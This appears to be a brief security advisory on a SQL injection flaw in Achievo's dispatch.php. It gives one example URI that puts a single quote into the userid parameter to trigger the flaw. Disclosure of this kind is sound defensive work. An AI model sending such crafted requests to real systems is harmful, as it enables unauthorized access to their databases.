Achievo 'dispatch.php' SQL Injection Vulnerability

Achievo 'dispatch.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/dispatch.php?atknodetype=reports.weekreport&atkaction=report&nameswitch=name&userid=%27&functionlevelswitch=all&startdate[day]=6&startdate[month]=7&startdate[year]=2009&enddate[day]=17&enddate[month]=7&enddate[year]=2009&showstatus=all&outputType=0&atkorderby=period